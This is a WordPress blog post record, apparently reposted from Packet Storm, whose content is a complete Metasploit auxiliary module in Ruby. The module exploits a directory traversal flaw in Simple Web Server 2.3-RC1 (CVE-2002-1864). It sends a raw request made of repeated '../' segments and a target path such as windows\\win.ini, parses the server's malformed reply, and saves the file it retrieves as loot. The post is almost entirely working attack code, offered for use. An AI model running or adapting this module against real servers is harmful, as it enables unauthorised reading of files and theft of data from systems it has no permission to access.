{"id":59355,"date":"2024-09-01T20:29:40","date_gmt":"2024-09-01T17:29:40","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181174\/simple_webserver_traversal.rb.txt"},"modified":"2024-09-01T20:29:40","modified_gmt":"2024-09-01T17:29:40","slug":"simple-web-server-2-3-rc1-directory-traversal","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/simple-web-server-2-3-rc1-directory-traversal\/","title":{"rendered":"Simple Web Server 2.3-RC1 Directory Traversal"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient<\/p>\n

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Simple Web Server 2.3-RC1 Directory Traversal’,
‘Description’ => %q{
This module exploits a directory traversal vulnerability found in
Simple Web Server 2.3-RC1.
},
‘References’ =>
[
[ ‘CVE’, ‘2002-1864’ ],
[ ‘OSVDB’, ‘88877’ ],
[ ‘EDB’, ‘23886’ ],
[ ‘URL’, ‘https:\/\/seclists.org\/bugtraq\/2013\/Jan\/12’ ]],
‘Author’ =>
[
‘CwG GeNiuS’,
‘sinn3r’
],
‘License’ => MSF_LICENSE,
‘DisclosureDate’ => ‘2013-01-03’
))<\/p>\n

register_options(
[
OptString.new(‘FILEPATH’, [true, ‘The name of the file to download’, ‘windows\\\\win.ini’]),
OptInt.new(‘DEPTH’, [true, ‘The max traversal depth’, 8])
])
end<\/p>\n

#
# The web server will actually return two HTTP statuses: A 400 (Bad Request), and the actual
# HTTP status — the second one is what we want. We cannot use the original update_cmd_parts()
# in Response, because that will only grab the first HTTP status.
#
def parse_status_line(res)
str = res.to_s<\/p>\n

status_line = str.scan(\/HTTP\\\/(.+?)\\s+(\\d+)\\s?(.+?)\\r?\\n?$\/)<\/p>\n

if status_line.empty?
print_error(“Invalid response command string.”)
return
elsif status_line.length == 1
proto, code, message = status_line[0]else
proto, code, message = status_line[1]end<\/p>\n

return message, code.to_i, proto
end<\/p>\n

#
# The MSF API cannot parse this weird response
#
def parse_body(res)
str = res.to_s
str.split(\/\\r\\n\\r\\n\/)[2] || ”
end<\/p>\n

def is_sws?
res = send_request_raw({‘uri’=>’\/’})
if res and res.headers[‘Server’].to_s =~ \/PMSoftware\\-SWS\/
return true
else
return false
end
end<\/p>\n

def run_host(ip)
if not is_sws?
print_error(“#{ip}:#{rport} – This isn’t a Simple Web Server”)
return
end<\/p>\n

uri = normalize_uri(“..\/”*datastore[‘DEPTH’], datastore[‘FILEPATH’])
res = send_request_raw({‘uri’=>uri})<\/p>\n

if not res
print_error(“#{ip}:#{rport} – Request timed out.”)
return
end<\/p>\n

# The weird HTTP response totally messes up Rex::Proto::Http::Response, HA!
message, code, proto = parse_status_line(res)
body = parse_body(res)<\/p>\n

if code == 200<\/p>\n

if body.empty?
# HD’s likes vprint_* in case it’s hitting a large network
vprint_status(“#{ip}:#{rport} – File is empty.”)
return
end<\/p>\n

vprint_line(body)
fname = ::File.basename(datastore[‘FILEPATH’])
p = store_loot(‘simplewebserver.file’, ‘application\/octet-stream’, ip, body, fname)
print_good(“#{ip}:#{rport} – #{fname} stored in: #{p}”)
else
print_error(“#{ip}:#{rport} – Unable to retrieve file: #{code.to_s} (#{message})”)
end
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Auxiliary::Scannerinclude Msf::Auxiliary::Reportinclude Msf::Exploit::Remote::HttpClient def initialize(info = {})super(update_info(info,‘Name’ => ‘Simple Web Server 2.3-RC1 Directory Traversal’,‘Description’ => %q{This module exploits a directory traversal vulnerability found inSimple Web Server 2.3-RC1.},‘References’ =>[[ ‘CVE’, ‘2002-1864’ ],[ ‘OSVDB’, ‘88877’ ],[ ‘EDB’, ‘23886’ ],[ ‘URL’, ‘https:\/\/seclists.org\/bugtraq\/2013\/Jan\/12’ ]],‘Author’ =>[‘CwG GeNiuS’,‘sinn3r’],‘License’ …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59355","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59355","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59355"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59355\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59355"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59355"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59355"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}